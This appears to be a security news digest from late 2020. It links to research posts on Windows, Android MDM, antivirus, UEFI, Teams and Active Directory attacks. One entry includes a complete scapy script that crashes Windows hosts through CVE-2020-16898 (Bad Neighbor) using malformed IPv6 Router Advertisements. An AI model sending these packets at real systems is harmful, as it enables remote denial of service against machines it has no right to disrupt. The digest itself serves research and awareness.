Bypassing Android MDM Using Electromagnetic Fault Injection By A Gas Lighter For $1.5
https://payatu.com/blog/arun/bypassing-android-mdm-using-electromagnetic-fault-injection-by-a-gas-lighter-for-$1.5$
SpeedPwning VMware Workstation
https://www.synacktiv.com/sites/default/files/2020-10/Speedpwning_VMware_Workstation.pdf
Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?
https://www.cyberark.com/resources/threat-research-blog/anti-virus-vulnerabilities-who-s-guarding-the-watch-tower
This blog entry is a special anti-malware edition showcasing how the most common bugs security products suffer from can allow a standard user to escalate into a privileged user. What we found...
Release the Kraken: Fileless APT attack abuses Windows Error Reporting service
https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
Bypassing Trend Micro Web Threat Protection via Punycode
https://www.inputzero.io/2020/08/bypass-trend-micro-web-threat-protection.html
TrendMicro Web Threat Protection - Bypass
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898)
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
There’s A Hole In Your SoC: Glitching The MediaTek BootROM
https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/
Forwarded from Noise Security Bit (AM)
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
from scapy.all import *
v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA();
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
    send(p)
Introducing MIDNIGHTTRAIN - A Covert Stage-3 Persistence Framework weaponizing UEFI variables
https://slaeryan.github.io/posts/midnighttrain.html
Let’s build a high-performance fuzzer with GPUs!
https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/
TL;DR: Can we use GPUs to get 10x performance/dollar when fuzzing embedded software in the cloud? Based on our preliminary work, we think the answer is yes! Fuzzing is a software testing technique that supplies programs with many randomized inputs in an attempt…
The Many Faces of Emotet
https://spamauditor.org/2020/10/the-many-faces-of-emotet/
Active Directory (AD) Attacks & Enumeration at the Network Layer
https://www.lares.com/blog/active-directory-ad-attacks-enumeration-at-the-network-layer/
Intro: Defending an Active Directory environment, particularly a large one, is a daunting task. Telemetry generated by Active Directory itself, as well as by the hosts connected to it, is critical…
Abusing Teams client protocol to bypass Teams security policies
https://o365blog.com/post/teams-policies/
Administrators can use teams policies for controlling what users can do in Microsoft Teams.
In this blog, I’ll show that these policies are applied only in the client and thus can be easily bypassed.
Forwarded from Noise Security Bit (AM)
EoP 0-day exploited in the wild: Windows Kernel Cryptography Driver cng.sys pool-based buffer overflow in IOCTL 0x390400
PoC: https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=2104
UAC bypasses from COMAutoApprovalList
https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
Intro (This post is made with permission of Arush Agarampur - an original author of all methods described below). Here and below we assu...